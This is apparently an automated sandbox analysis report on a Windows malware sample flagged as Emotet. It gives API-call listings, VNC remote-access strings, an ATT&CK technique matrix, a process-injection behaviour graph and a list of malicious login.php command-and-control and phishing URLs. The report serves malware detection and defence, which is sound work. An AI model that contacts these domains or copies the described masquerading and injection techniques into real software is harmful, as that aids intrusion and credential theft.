Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00402240 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402240
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00403900 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle,2_2_02C74920
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004033A0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004033A0

Remote Access Functionality

barindex
Contains VNC / remote desktop functionality (version string found)
Source: WlCVLbzNph.exeString found in binary or memory: RFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exeString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exeString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000005.00000002.1935549687.0000000001200000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000005.00000002.1935549687.0000000001200000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000005.00000002.1937317769.0000000001410000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000005.00000002.1937317769.0000000001410000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exeString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exeString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000006.00000002.1937351360.0000000001380000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000006.00000002.1937351360.0000000001380000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exeString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exeString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000A.00000002.1940866370.0000000003070000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000A.00000002.1940866370.0000000003070000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000A.00000002.1943305461.0000000003210000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000A.00000002.1943305461.0000000003210000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000D.00000002.1947004651.0000000003160000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000D.00000002.1947004651.0000000003160000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000D.00000002.1943298176.0000000002F60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000D.00000002.1943298176.0000000002F60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000F.00000002.1873568549.0000000002B50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000F.00000002.1873568549.0000000002B50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000F.00000002.1874297883.0000000002E20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000000F.00000002.1874297883.0000000002E20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000014.00000002.1898050136.00000000013A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000014.00000002.1898050136.00000000013A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000016.00000002.1894178366.0000000002A50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000016.00000002.1894178366.0000000002A50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000016.00000002.1899368962.0000000002CF0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000016.00000002.1899368962.0000000002CF0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000019.00000002.1906960513.0000000000E70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000019.00000002.1906960513.0000000000E70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000019.00000002.1911179292.00000000029F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000019.00000002.1911179292.00000000029F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001E.00000002.2074493087.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001E.00000002.2074493087.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001E.00000002.2063346012.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 0000001E.00000002.2063346012.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000020.00000002.2056434663.00000000026B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000020.00000002.2056434663.00000000026B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000023.00000002.2053120888.0000000000F70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000023.00000002.2053120888.0000000000F70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1991998066.0000000002CD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1991998066.0000000002CD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1991709433.0000000002C00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1991709433.0000000002C00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C888F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02C888F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9E6D0 setsockopt,htons,socket,setsockopt,bind,2_2_02C9E6D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9F4A0 htons,socket,setsockopt,closesocket,bind,listen,2_2_02C9F4A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014288F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_014288F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0143F4A0 htons,socket,setsockopt,closesocket,bind,listen,5_2_0143F4A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0143E6D0 setsockopt,htons,socket,setsockopt,bind,5_2_0143E6D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013988F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_013988F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013AF4A0 htons,socket,setsockopt,closesocket,bind,listen,6_2_013AF4A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013AE6D0 setsockopt,htons,socket,setsockopt,bind,6_2_013AE6D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032288F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,10_2_032288F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0323E6D0 setsockopt,htons,socket,setsockopt,bind,10_2_0323E6D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0323F4A0 htons,socket,setsockopt,closesocket,bind,listen,10_2_0323F4A0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		22
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		111
Input Capture		2
System Time Discovery		1
Remote Desktop Protocol		1
Archive Collected Data		4
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
Create Account		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory11
Account Discovery		Remote Desktop Protocol1
Screen Capture		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		1
Valid Accounts		1
Valid Accounts		1
Obfuscated Files or Information		Security Account Manager1
System Network Connections Discovery		SMB/Windows Admin Shares111
Input Capture		11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Scheduled Task/Job		1
Access Token Manipulation		31
Software Packing		NTDS2
File and Directory Discovery		Distributed Component Object Model2
Clipboard Data		1
Remote Access Software		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		613
Process Injection		1
DLL Side-Loading		LSA Secrets143
System Information Discovery		SSHKeylogging3
Non-Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Bootkit		1
Scheduled Task/Job		322
Masquerading		Cached Domain Credentials1
Query Registry		VNCGUI Input Capture14
Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		1
Valid Accounts		DCSync351
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem151
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow13
Process Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
Process Injection		Network Sniffing11
Application Window Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Bootkit		Input Capture1
System Owner/User Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553823 Sample: WlCVLbzNph.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 38 vowyzuf.com 2->38 40 vowymom.com 2->40 42 1010 other IPs or domains 2->42 56 Suricata IDS alerts for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 18 other signatures 2->62 9 WlCVLbzNph.exe 2 3 2->9         started        signatures3 process4 file5 34 C:\Windows\apppatch\svchost.exe, PE32 9->34 dropped 36 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->36 dropped 64 Detected unpacking (changes PE section rights) 9->64 66 Detected unpacking (overwrites its own PE header) 9->66 68 Moves itself to temp directory 9->68 70 8 other signatures 9->70 13 svchost.exe 2 110 9->13         started        signatures6 process7 dnsIp8 44 vopyret.com 13->44 46 vocyjic.com 13->46 48 28 other IPs or domains 13->48 72 System process connects to network (likely due to code injection or exploit) 13->72 74 Detected unpacking (changes PE section rights) 13->74 76 Detected unpacking (overwrites its own PE header) 13->76 78 16 other signatures 13->78 17 nPtwtzGyOdAtB.exe 13->17 injected 20 nPtwtzGyOdAtB.exe 13->20 injected 22 nPtwtzGyOdAtB.exe 13->22 injected 24 10 other processes 13->24 signatures9 process10 signatures11 50 Monitors registry run keys for changes 17->50 52 Contains VNC / remote desktop functionality (version string found) 17->52 54 Found direct / indirect Syscall (likely to bypass EDR) 17->54 26 WerFault.exe 21 24->26         started        28 WerFault.exe 24->28         started        30 WerFault.exe 24->30         started        32 4 other processes 24->32 process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
WlCVLbzNph.exe84%ReversingLabsWin32.Trojan.Emotet
WlCVLbzNph.exe100%AviraTR/Crypt.XPACK.Gen
WlCVLbzNph.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://puvymul.com/http://puvymul.com/100%Avira URL Cloudmalware
http://qedysov.com/login.php100%Avira URL Cloudmalware
http://gaqycyz.com/100%Avira URL Cloudmalware
http://gatypas.com/login.php100%Avira URL Cloudmalware
http://pupymol.com/login.php100%Avira URL Cloudmalware
http://vojyzyt.com/login.php100%Avira URL Cloudmalware
http://vopycoc.com/login.php100%Avira URL Cloudmalware
http://qeqykop.com/login.php100%Avira URL Cloudmalware
http://vofybic.com/login.php100%Avira URL Cloudmalware
http://vocyjet.com/login.php100%Avira URL Cloudmalware
http://lyryvur.com/100%Avira URL Cloudmalware
http://purycap.com/login.php100%Avira URL Cloudmalware
http://lykyfud.com/login.php100%Avira URL Cloudmalware
http://puzylyp.com/login.php100%Avira URL Cloudmalware
http://galyvuz.com/login.php100%Avira URL Cloudmalware
http://vowyrif.com/login.php100%Avira URL Cloudmalware
http://qegyvuq.com/login.php100%Avira URL Cloudphishing
http://qexyryl.com/100%Avira URL Cloudphishing
http://qeqyxov.com/login.php100%Avira URL Cloudmalware
http://vowydef.com/login.php100%Avira URL Cloudmalware
http://qekyvup.com/login.php100%Avira URL Cloudmalware
http://qexynyq.com/login.php100%Avira URL Cloudmalware
http://ww16.vofycot.com/login.php?sub1=20241112-0426-044d-b465-1d078f2f97da100%Avira URL Cloudmalware
http://gaqycos.com/100%Avira URL Cloudmalware
http://qexyfuq.com/login.php100%Avira URL Cloudmalware
http://lyryman.com/login.php100%Avira URL Cloudmalware
http://lysyvax.com/login.php100%Avira URL Cloudmalware
http://lyvymej.com/login.php100%Avira URL Cloudmalware
http://vocyruk.com/login.php100%Avira URL Cloudphishing
http://lyryled.com/login.php100%Avira URL Cloudmalware
http://galydyw.com/login.php100%Avira URL Cloudmalware
http://vofydac.com/login.php100%Avira URL Cloudmalware
http://vowyrym.com/login.php100%Avira URL Cloudphishing
http://qekyhil.com/login.php100%Avira URL Cloudmalware
http://gacyhez.com/login.php100%Avira URL Cloudmalware
http://vojydoc.com/100%Avira URL Cloudmalware
http://pujycil.com/login.php100%Avira URL Cloudmalware
http://lygysij.com/login.php100%Avira URL Cloudmalware
http://pufytip.com/login.php100%Avira URL Cloudmalware
http://lyxywer.com/100%Avira URL Cloudmalware
http://lysytoj.com/login.php100%Avira URL Cloudmalware
http://gatykyh.com/login.php100%Avira URL Cloudmalware
http://qetykyq.com/login.php100%Avira URL Cloudmalware
http://vopykum.com/login.phpu100%Avira URL Cloudmalware
http://vowykaf.com/login.php0%Avira URL Cloudsafe
http://gadyniw.com/login.php100%Avira URL Cloudmalware
http://qedyfyq.com/login.php100%Avira URL Cloudmalware
http://vofypam.com/login.php100%Avira URL Cloudmalware
http://pupywyv.com/login.php100%Avira URL Cloudphishing
http://qegyval.com/login.php100%Avira URL Cloudmalware
http://pujyjup.com/http://purycul.com/http://lykyjux.com/http://pupyboq.com/http://qedynaq.com/http:100%Avira URL Cloudmalware
http://lyvymir.com/login.php100%Avira URL Cloudmalware
http://lygyxux.com/login.php100%Avira URL Cloudmalware
http://puzybil.com/login.php0%Avira URL Cloudsafe
http://lyvynid.com/login.php100%Avira URL Cloudmalware
https://puzylyp.com/login.php100%Avira URL Cloudmalware
http://lykyfen.com/http://lykyfen.com/H100%Avira URL Cloudmalware
http://vojybim.com/login.php100%Avira URL Cloudphishing
http://puvymul.com/100%Avira URL Cloudmalware
